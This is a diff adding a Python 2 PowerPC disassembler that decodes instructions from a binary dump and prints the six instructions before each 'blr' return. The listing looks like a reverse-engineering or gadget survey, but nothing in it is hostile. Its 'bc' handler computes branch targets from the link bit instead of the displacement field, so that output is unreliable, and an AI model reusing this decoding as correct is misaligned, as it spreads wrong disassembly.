+    return (value >> 21) & 0x1F, (value >> 16) & 0x1F, value & 0xFFFF
+
+def decodeX(value):
+    return (value >> 21) & 0x1F, (value >> 16) & 0x1F, (value >> 11) & 0x1F, (value >> 1) & 0x3FF, value & 1
+
+def extend_sign(value, bits=16):
+    if value & 1 << (bits - 1):
+        value -= 1 << bits
+    return value
+
+def ihex(value):
+    return "-" * (value < 0) + "0x" + hex(value).lstrip("-0x").rstrip("L").zfill(1).upper()
+
+def decodeCond(BO, BI):
+    #TODO: Better condition code
+    if BO == 20: return ""
+    if BO & 1: return "?"
+    if BI > 2: return "?"
+    if BO == 4: return condition_table_false[BI]
+    if BO == 12: return condition_table_true[BI]
+    return "?"
+
+def loadStore(value, regtype="r"):
+    D, A, d = decodeD(value)
+    d = extend_sign(d)
+    return "%s%i, %s(r%i)" %(regtype, D, ihex(d), A)
+
+def loadStoreX(D, A, B, pad):
+    if pad: return "<invalid>"
+    return "r%i, %s, r%i" %(D, ("r%i" %A) if A else "0", B)
+
+def add(D, A, B, Rc):
+    return "add%s" %("." * Rc), "r%i, r%i, r%i" %(D, A, B)
+
+def addi(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    if A == 0:
+        return "li", "r%i, %s" %(D, ihex(SIMM))
+    return "addi", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def addic(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    return "addic", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def addic_(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    return "addic.", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def addis(value, addr):
+    D, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    if A == 0:
+        return "lis", "r%i, %s" %(D, ihex(SIMM))
+    return "addis", "r%i, r%i, %s" %(D, A, ihex(SIMM))
+
+def and_(S, A, B, Rc):
+    return "and%s" % ("." * Rc), "r%i, r%i, r%i" % (A, S, B)
+
+def b(value, addr):
+    LI, AA, LK = decodeI(value)
+    LI = extend_sign(LI, 24) * 4
+    if AA:
+        dst = LI
+    else:
+        dst = addr + LI
+    return "b%s%s" %("l" * LK, "a" * AA), ihex(dst)
+
+def bc(value, addr):
+    BO, BI, BD, AA, LK = decodeB(value)
+    LI = extend_sign(LK, 14) * 4
+    instr = "b" + decodeCond(BO, BI)
+    if LK: instr += "l"
+    if AA:
+        instr += "a"
+        dst = LI
+    else:
+        dst = addr + LI
+    return instr, ihex(dst)
+
+def bcctr(BO, BI, pad, LK):
+    if pad: return "<invalid>"
+    instr = "b" + decodeCond(BO, BI) + "ctr"
+    if LK:
+        instr += "l"
+    return instr
+
+def bclr(BO, BI, pad, LK):
+    if pad: return "<invalid>"
+    instr = "b" + decodeCond(BO, BI) + "lr"
+    if LK:
+        instr += "l"
+    return instr
+
+def cmp(cr, A, B, pad):
+    if pad: return "<invalid>"
+    if cr & 3:
+        return "<invalid>"
+    return "cmp", "cr%i, r%i, r%i" %(cr >> 2, A, B)
+
+def cmpi(value, addr):
+    cr, A, SIMM = decodeD(value)
+    SIMM = extend_sign(SIMM)
+    if cr & 3:
+        return "<invalid>"
+    return "cmpwi", "cr%i, r%i, %s" %(cr >> 2, A, ihex(SIMM))
+
+def cmpl(cr, A, B, pad):
+    if pad: return "<invalid>"
+    if cr & 3:
+        return "<invalid>"
+    return "cmplw", "cr%i, r%i, r%i" %(cr >> 2, A, B)
+
+def cmpli(value, addr):
+    cr, A, UIMM = decodeD(value)
+    if cr & 3:
+        return "<invalid>"
+    return "cmplwi", "cr%i, r%i, %s" %(cr >> 2, A, ihex(UIMM))
+
+def cntlzw(S, A, pad, Rc):
+    if pad: return "<invalid>"
+    return "cntlzw%s" %("." * Rc), "r%i, r%i" %(A, S)
+
+def dcbst(pad1, A, B, pad2):
+    if pad1 or pad2: return "<invalid>"
+    return "dcbst", "r%i, r%i" %(A, B)
+
+def fmr(D, pad, B, Rc):
+    if pad: return "<invalid>"
+    return "fmr%s" %("." * Rc), "f%i, f%i" %(D, B)
+
+def fneg(D, pad, B, Rc):
+    if pad: return "<invalid>"
+    return "fneg%s" %("." * Rc), "f%i, f%i" %(D, B)
+
+def mfspr(D, sprLo, sprHi, pad):
+    if pad: return "<invalid>"
+    sprnum = (sprHi << 5) | sprLo
+    if sprnum not in spr_table:
+        spr = "?"
+    else:
+        spr = spr_table[sprnum]
+    return "mf%s" %spr, "r%i" %D
+
+def mtspr(S, sprLo, sprHi, pad):
+    if pad: return "<invalid>"
+    sprnum = (sprHi << 5) | sprLo
+    if sprnum not in spr_table:
+        spr = ihex(sprnum)
+    else:
+        spr = spr_table[sprnum]
+    return "mt%s" %spr, "r%i" %S
+
+def lbz(value, addr): return "lbz", loadStore(value)
+def lfd(value, addr): return "lfd", loadStore(value, "f")
+def lfs(value, addr): return "lfs", loadStore(value, "f")
+def lmw(value, addr): return "lmw", loadStore(value)
+def lwz(value, addr): return "lwz", loadStore(value)
+def lwzu(value, addr): return "lwzu", loadStore(value)
+def lwarx(D, A, B, pad): return "lwarx", loadStoreX(D, A, B, pad)
+def lwzx(D, A, B, pad): return "lwzx", loadStoreX(D, A, B, pad)
+
+def or_(S, A, B, Rc):
+    if S == B:
+        return "mr%s" %("." * Rc), "r%i, r%i" %(A, S)
+    return "or%s" %("." * Rc), "r%i, r%i, r%i" %(A, S, B)
+
+def ori(value, addr):
+    S, A, UIMM = decodeD(value)
+    if UIMM == 0:
+        return "nop"
+    return "ori", "r%s, r%s, %s" %(A, S, ihex(UIMM))
+
+def oris(value, addr):
+    S, A, UIMM = decodeD(value)
+    return "oris", "r%s, r%s, %s" %(A, S, ihex(UIMM))
+
+def rlwinm(value, addr):
+    S, A, SH, M, Rc = decodeX(value)
+    MB = M >> 5
+    ME = M & 0x1F
+    dot = "." * Rc
+    if SH == 0 and MB == 0 and ME == 31:
+        return "nop"
+    if MB == 0 and ME == 31 - SH:
+        return "slwi%s" %dot, "r%i, r%i, %i" %(A, S, SH)
+    if ME == 31 and SH == 32 - MB:
+        return "srwi%s" %dot, "r%i, r%i, %i" %(A, S, MB)
+    if MB == 0 and ME < 31:
+        return "extlwi%s" %dot, "r%i, r%i, %i,%i" %(A, S, ME + 1, SH)
+    #extrwi
+    if MB == 0 and ME == 31:
+        if SH >= 16:
+            return "rotlwi%s" %dot, "r%i, r%i, %i" %(A, S, SH)
+        return "rotrwi%s" %dot, "r%i, r%i, %i" %(A, S, 32 - SH)
+    if SH == 0 and ME == 31:
+        return "clrlwi%s" %dot, "r%i, r%i, %i" %(A, S, MB)
+    if SH == 0 and MB == 0:
+        return "clrrwi%s" %dot, "r%i, r%i, %i" %(A, S, 31 - ME)
+    #clrlslwi
+    return "rlwinm%s" %dot, "r%i, r%i, %i,%i,%i" %(A, S, SH, MB, ME)
+
+def sc(value, addr):
+    if value & 0x3FFFFFF != 2:
+        return "<invalid>"
+    return "sc"
+
+def stb(value, addr): return "stb", loadStore(value)
+def stfd(value, addr): return "stfd", loadStore(value, "f")
+def stfs(value, addr): return "stfs", loadStore(value, "f")
+def stfsu(value, addr): return "stfsu", loadStore(value, "f")
+def stmw(value, addr): return "stmw", loadStore(value)
+def stw(value, addr): return "stw", loadStore(value)
+def stwu(value, addr): return "stwu", loadStore(value)
+def stbx(S, A, B, pad): return "stbx", loadStoreX(S, A, B, pad)
+def stwx(S, A, B, pad): return "stwx", loadStoreX(S, A, B, pad)
+def stwcx(S, A, B, pad): return "stwcx", loadStoreX(S, A, B, pad ^ 1)
+
+def tw(TO, A, B, pad):
+    if pad: return "<invalid>"
+    if TO == 31 and A == 0 and B == 0:
+        return "trap"
+
+    if TO not in trap_condition_table:
+        condition = "?"
+    else:
+        condition = trap_condition_table[TO]
+    return "tw%s" %condition, "r%i, r%i" %(A, B)
+
+opcode_table_ext1 = {
+    16: bclr,
+    528: bcctr
+}
+
+opcode_table_ext2 = {
+    0: cmp,
+    4: tw,
+    20: lwarx,
+    23: lwzx,
+    26: cntlzw,
+    28: and_,
+    32: cmpl,
+    54: dcbst,
+    150: stwcx,
+    151: stwx,
+    215: stbx,
+    266: add,
+    339: mfspr,
+    444: or_,
+    467: mtspr
+}
+
+opcode_table_float_ext1 = {
+    40: fneg,
+    72: fmr
+}
+
+def ext1(value, addr):
+    DS, A, B, XO, Rc = decodeX(value)
+    if not XO in opcode_table_ext1:
+        return "ext1 - %s" %bin(XO)
+    return opcode_table_ext1[XO](DS, A, B, Rc)
+
+def ext2(value, addr):
+    DS, A, B, XO, Rc = decodeX(value)
+    if not XO in opcode_table_ext2:
+        return "ext2 - %s" %bin(XO)
+    return opcode_table_ext2[XO](DS, A, B, Rc)
+
+def float_ext1(value, addr):
+    D, A, B, XO, Rc = decodeX(value)
+    if not XO in opcode_table_float_ext1:
+        return "float_ext1 - %s" %bin(XO)
+    return opcode_table_float_ext1[XO](D, A, B, Rc)
+
+opcode_table = {
+    10: cmpli,
+    11: cmpi,
+    12: addic,
+    13: addic_,
+    14: addi,
+    15: addis,
+    16: bc,
+    17: sc,
+    18: b,
+    19: ext1,
+    21: rlwinm,
+    24: ori,
+    25: oris,
+    31: ext2,
+    32: lwz,
+    33: lwzu,
+    34: lbz,
+    36: stw,
+    37: stwu,
+    38: stb,
+    46: lmw,
+    47: stmw,
+    48: lfs,
+    50: lfd,
+    52: stfs,
+    53: stfsu,
+    54: stfd,
+    63: float_ext1
+}
+
+def disassemble(value, address):
+    opcode = value >> 26
+    if opcode not in opcode_table:
+        return "???"
+    instr = opcode_table[opcode](value, address)
+    if type(instr) == str:
+        return instr
+    return instr[0] + " " * (10 - len(instr[0])) + instr[1]
+    
+def disassembleFile(file):
+    f = open(file, "rb")
+    add = 0x01000000
+    old = ["", "", "","","",""]
+    while True:
+        opcode = unpack(">I", f.read(4))[0]
+        res = disassemble(opcode, add)
+        #print "%08x : " % (add),
+        #print res
+        for i in range(len(old)-1):
+            old[i] = old[i+1]
+        old[len(old)-1] = res
+        if res == "blr":
+            print "%08x : " % (add - (len(old)*4)),
+            for i in range(len(old)):
+                print "%s ; " % (old[i]),
+            print ""
+        add+=4
+    f.close()
+
+disassembleFile("DUMP0E.bin")